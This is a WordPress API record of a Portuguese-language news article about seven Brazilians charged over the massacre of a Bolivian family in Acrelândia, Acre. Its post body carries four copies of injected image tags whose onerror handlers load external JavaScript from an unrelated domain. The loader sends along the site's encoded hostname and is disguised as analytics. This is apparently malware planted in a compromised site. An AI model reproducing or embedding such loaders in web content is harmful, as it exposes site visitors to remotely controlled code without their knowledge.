{"id":51751,"date":"2020-12-09T20:32:08","date_gmt":"2020-12-09T20:32:08","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/12\/09\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/"},"modified":"2020-12-09T20:32:08","modified_gmt":"2020-12-09T20:32:08","slug":"brasileiros-viram-reus-da-chacina-contra-familia-boliviana","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/","title":{"rendered":"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Sete pessoas estavam envolvidas diretamente na chacina<\/span><\/p>\n<p style=\"text-align: justify;\">Os brasileiros acusados da chacina contra uma fam\u00edlia boliviana viraram r\u00e9us. A justi\u00e7a de Acrel\u00e2ndia acatoua den\u00fancia feita pelo Minist\u00e9rio P\u00fablico. Sete pessoas, sendo seis da mesma fam\u00edlia, participaram do assassinato da fam\u00edlia boliviana, apenas uma adolescente de treze anos que foi atingida por disparo de espingarda conseguiu sobreviver.<\/p>\n<p style=\"text-align: justify;\">O crime aconteceu no dia 13 de setembro no Laranjal no munic\u00edpio de Acrel\u00e2ndia na fronteira Brasil e Bol\u00edvia. Essa \u00e1rea estava sendo desmatada pela fam\u00edlia boliviana, para Pedro Ribas o pai dos jovens mortos na chacina, quem motivou os crimes foi Geovan Nascimento Silva o Bulu.<\/p>\n<p style=\"text-align: justify;\">Pedro descobriu que Bulu havia estuprado sua filha e o amarrou enquanto buscava a pol\u00edcia, nesse intervalo de tempo, os irm\u00e3os e amigos de Bulu montaram um plano de resgate. Ao chegar ao local decidiram matar a fam\u00edlia e pegar as espingardas, ap\u00f3s atirar nas v\u00edtimas, os corpos foram colocados entre ra\u00edzes de uma \u00e1rvore, a adolescente de 13 anos mesmo ferida conseguiu fugir e buscar ajuda.<\/p>\n<p style=\"text-align: justify;\">Segundo a pol\u00edcia de Acrel\u00e2ndia pelo menos sete pessoas estavam envolvidas diretamente nas mortes. Quatro est\u00e3o presas s\u00e3o elas Jos\u00e9 Francisco Mendes de Souza, um amigo da fam\u00edlia que segundo as investiga\u00e7\u00f5es atirou na m\u00e3e e em um dos jovens; Geane Nascimento, Luciano de Oliveira que atirou em um dos jovens; Jean Carlos Nascimento as Silva tamb\u00e9m ir\u00e1 responder pelos crimes, segundo a pol\u00edcia ele n\u00e3o estava no local, mas deu suporte aos filhos e atrapalhou as investiga\u00e7\u00f5es. O adolescente que efetuou disparo contra os jovens foi apreendido.<\/p>\n<p style=\"text-align: justify;\">Dois r\u00e9us ainda est\u00e3o foragidos s\u00e3o eles: Bulu, acusado de estupro e seu irm\u00e3o Giovane Nascimento da Silva.<\/p>\n<p style=\"text-align: justify;\">De acordo com o delegado respons\u00e1vel eles ir\u00e3o responder pelos crimes de integrar organiza\u00e7\u00e3o criminosa, homic\u00eddio qualificado em sua forma consumada e tentada estupro. O adolescente apreendido tamb\u00e9m deve responder por ter participado do ato criminoso. Mesmo ap\u00f3s o final das investiga\u00e7\u00f5es as buscas pelos autores continuam porque eles est\u00e3o com mandado de pris\u00e3o em aberto.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Sete pessoas estavam envolvidas diretamente na chacina<\/span><\/p>\n","protected":false},"author":4,"featured_media":51750,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-51751","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Sete pessoas estavam envolvidas diretamente na chacina\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-09T20:32:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/\",\"name\":\"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png\",\"datePublished\":\"2020-12-09T20:32:08+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png\",\"width\":458,\"height\":340,\"caption\":\"09-12-2020 Brasileiros-viram-r\u00e9us-da-chacina-contra-fam\u00edlia-boliviana\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/","og_locale":"pt_BR","og_type":"article","og_title":"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana - Agazeta.net","og_description":"Sete pessoas estavam envolvidas diretamente na chacina","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/","og_site_name":"Agazeta.net","article_published_time":"2020-12-09T20:32:08+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png","type":"image\/png"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/","name":"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png","datePublished":"2020-12-09T20:32:08+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/09-12-2020_Brasileiros-viram-reus-da-chacina-contra-familia-boliviana.png","width":458,"height":340,"caption":"09-12-2020 Brasileiros-viram-r\u00e9us-da-chacina-contra-fam\u00edlia-boliviana"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/brasileiros-viram-reus-da-chacina-contra-familia-boliviana\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Brasileiros viram r\u00e9us da chacina contra fam\u00edlia boliviana"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=51751"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51751\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/51750"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=51751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=51751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=51751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}